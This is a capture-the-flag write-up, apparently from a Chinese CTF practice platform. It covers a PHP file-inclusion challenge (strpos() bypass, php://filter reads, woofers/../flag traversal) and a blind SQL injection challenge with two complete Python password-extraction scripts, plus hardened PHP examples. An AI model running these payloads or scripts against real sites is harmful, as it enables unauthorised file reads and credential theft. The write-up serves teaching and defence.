[BSidesCF 2020] Had a bad day

Tried index.php, but nothing came back!
Later I found that only an absolute path works: /var/www/html/index.php
payload1:
```
http://9c0ca921-9fa2-4a89-b31b-750748be1868.node3.buuoj.cn/index.php?category=pHp://FilTer/convert.base64-encode/resource=index
http://9c0ca921-9fa2-4a89-b31b-750748be1868.node3.buuoj.cn/index.php?category=pHp://FilTer/convert.base64-encode/resource=/var/www/html/index
```

```php
<?php
$file = $_GET['category'];
if (isset($file)) {
    // The first two tests use "!== false"; the third one does not, so a match
    // at position 0 (strpos() == 0) is treated as "no match".
    if (strpos($file, "woofers") !== false || strpos($file, "meowers") !== false || strpos($file, "index")) {
        include ($file . '.php');
    } else {
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
```

Reading the source shows the filter rule used here!
strpos — find the position of the first occurrence of a substring in a string
Return value:
Returns the position where needle starts inside haystack (independent of offset). Note that string positions start at 0, not at 1.
If needle is not found, **false** is returned.
If you pass `index` directly, strpos returns 0, which is falsy, so the include does not run! But if you pass `1index` it returns 1, which is truthy; that makes the include fail and print the error message (with the path)!
So, directly:
```
http://9c0ca921-9fa2-4a89-b31b-750748be1868.node3.buuoj.cn/index.php?category=111index/../flag
```

ooooo:
Understanding: it took me half a day to understand `woofers/../flag`!! I'm bad at this.
`woofers` is just some directory name that passes the filter; `/` enters that directory, `../` goes back up one level, and then `flag` can be read directly!
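To make the strpos() pitfall concrete from the defender's side, here is an added PHP example (not the challenge's code): the challenge's check is reproduced as a function next to an allow-list version that compares whole page names with strict equality and includes only from a fixed directory. The `pages/` layout is an assumption made for the example; the inputs are the ones from this write-up.

```php
<?php
// Added example, not the challenge source. The original check is reproduced
// only to show its verdicts next to the hardened version.

// Original logic: strpos() returns 0 when "index" sits at position 0, and 0 is
// falsy, so "index" is rejected while "1index" (strpos() == 1) is accepted. The
// other two tests use !== false, which is the correct idiom.
function original_allows(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");
}

// Hardened logic: the whole value must equal one allow-listed name (strict
// comparison), so substring tricks ("1index"), traversal ("woofers/../flag")
// and stream wrappers ("php://filter/...") all fail the check.
function hardened_allows(string $file): bool
{
    $allowed = ['woofers', 'meowers', 'index'];
    return in_array($file, $allowed, true);
}

function hardened_include(string $file): void
{
    if (!hardened_allows($file)) {
        echo "Sorry, we currently only support woofers and meowers.";
        return;
    }
    // Assumed layout for this example: pages/<name>.php next to this script.
    include __DIR__ . '/pages/' . $file . '.php';
}

// Constructed inputs taken from the write-up, with each check's verdict.
$inputs = [
    'index',
    '1index',
    'woofers/../flag',
    'php://filter/convert.base64-encode/resource=index',
];
foreach ($inputs as $in) {
    printf("%-52s original: %-5s hardened: %s\n",
        $in,
        original_allows($in) ? 'allow' : 'deny',
        hardened_allows($in) ? 'allow' : 'deny');
}
```

Run it with `php` on the command line: the original check denies only the first input and allows the other three; the hardened check allows only the first.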


payload2:
```
php://filter/read=convert.base64-encode/woofers/resource=index
http://9c0ca921-9fa2-4a89-b31b-750748be1868.node3.buuoj.cn/index.php?category=pHp://FilTer/convert.base64-encode/resource=woofers/../flag
```
The php://filter pseudo-protocol can also be used to wrap one more layer (this variant also produces an error!!):
```
php://filter/read=convert.base64-encode/woofers/resource=index
php://filter/read=convert.base64-encode/woofers/resource=flag
```
[BJDCTF 2nd] Simple Injection
I just watched a Korean movie!!!
Korean movies really are worth making!!! Every time I watch one I feel so much!

You konw ,P3rh4ps needs a girl friend


The hint is obvious! It should be SQL injection!!!
Visit hint.txt:
Only u input the correct password then u can get the flag and p3rh4ps wants a girl friend.
```sql
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
select * from users where username='1\' and password='$_POST["password"]';
select * from users where username='1\' and password='or/**/if(1,sleep(3),0)#';
```
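The backslash trick works because the query text is assembled by string interpolation. As an added PHP example (not the challenge's source), here is the interpolated builder from the hint beside a PDO prepared statement; the table and column names come from the hint's query, and the connection details are placeholders.

```php
<?php
// Added example, not the challenge's code. Table and column names follow the
// query shown in hint.txt; connection details are placeholders.

// Vulnerable pattern: values are spliced into the SQL text. A username ending
// in a backslash ("1\") escapes the closing quote of its literal, so the text
// up to the next quote, including the password value, is parsed as SQL.
function build_query_vulnerable(string $username, string $password): string
{
    return "select * from users where username='$username' and password='$password';";
}

// Hardened pattern: the SQL text is fixed and the values travel as bound
// parameters, so no character in the input can change the query's structure.
// (Plaintext password comparison is kept only to mirror the hint's query.)
function find_user(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare(
        'select * from users where username = :username and password = :password'
    );
    $stmt->execute([':username' => $username, ':password' => $password]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// What the vulnerable builder produces for the input from this write-up.
echo build_query_vulnerable('1\\', 'or/**/if(1,sleep(3),0)#'), "\n";
// -> select * from users where username='1\' and password='or/**/if(1,sleep(3),0)#';

// Usage against MySQL (placeholders for the connection):
// $pdo = new PDO('mysql:host=DB_HOST;dbname=DB_NAME', 'DB_USER', 'DB_PASS', [
//     PDO::ATTR_EMULATE_PREPARES => false,          // server-side prepares
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
// ]);
// $user = find_user($pdo, $_POST['username'] ?? '', $_POST['password'] ?? '');
```

With `ATTR_EMULATE_PREPARES` disabled the driver sends the statement and the parameters separately, so a trailing backslash in the username is just one more byte of data.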
So logging in gives the flag!
Fuzzed it a bit:
Filtered:
union, select, single quote ', double quote ", and, =, etc.!
No echo either!
I considered error-based injection:
but that needs select, and = after it, and like is gone as well! So blind injection it is!!
payload1:
```
or/**/if(1,sleep(3),0)#
or/**/if(ascii(substr(username,%d,1))>%d,1,0)#        % (i, mid)
or/**/if(ascii(substr(username,%d,1))>%d,sleep(3),0)# % (i, mid)
```
Tried it!:
```
or/**/if(ascii(substr(username,%d,1))>%d,sleep(3),0)#
payload["password"] = "or/**/if(ascii(substr(password,%d,1))>%d,sleep(3),0)#" % (i, mid)
```
Username extracted: admin
exp:
```python
import requests
import sys
import time

url = "http://fbae1ca3-500b-4a80-bf56-7e78489ec089.node3.buuoj.cn/"

# The trailing backslash escapes the closing quote of the username literal,
# so the password field becomes the injection point.
payload = {"username": "1\\", "password": ""}


def login(payload):
    """Send one login attempt and report whether sleep(3) fired."""
    before_time = time.time()
    response = requests.post(url, data=payload)
    if response.status_code == 429:
        print("too fast")
        time.sleep(4)
    if "Hacker" in response.text:
        print("[-] WAF")
        sys.exit(1)
    offset = time.time() - before_time
    return offset > 2.5


def main():
    data = "result : "
    print("begin:")
    for i in range(1, 500):
        # Binary search on the ASCII code of character i. low starts one below
        # the printable range: ascii() of an empty substring is 0, so past the
        # end of the string every "> mid" test is false and low stays at 32.
        top = 127
        low = 32
        while low <= top:
            mid = (top + low) // 2
            payload["password"] = (
                "or/**/if(ascii(substr(password,%d,1))>%d,sleep(3),0)#" % (i, mid)
            )
            print(payload)
            if login(payload):
                low = mid + 1
            else:
                top = mid - 1
        # When the loop ends, low is the character's code (mid would be off by one).
        if low == 32:
            break
        data += chr(low)
        print("[+] Found : %s" % data)


if __name__ == "__main__":
    main()
```
Looking at another player's exp:
```python
import requests
import time

url = "http://fbae1ca3-500b-4a80-bf56-7e78489ec089.node3.buuoj.cn/"
data = {"username": "admin\\", "password": ""}
result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127
    # Boolean-based variant: the page answers "stronger" when the if() is true.
    while head < tail:
        mid = (head + tail) >> 1
        payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
        data["password"] = payload
        r = requests.post(url, data=data)
        if r.status_code == 429:
            print("fast")
            time.sleep(2)
            continue  # retry this mid instead of treating a rate-limit reply as "false"
        if "stronger" in r.text:
            head = mid + 1
        else:
            tail = mid
    # head == tail holds the character; 32 means ascii() returned 0 (end of string).
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
```
One thing to note! In the binary search!!!!! The final value you take must be low (head); taking mid is buggy!
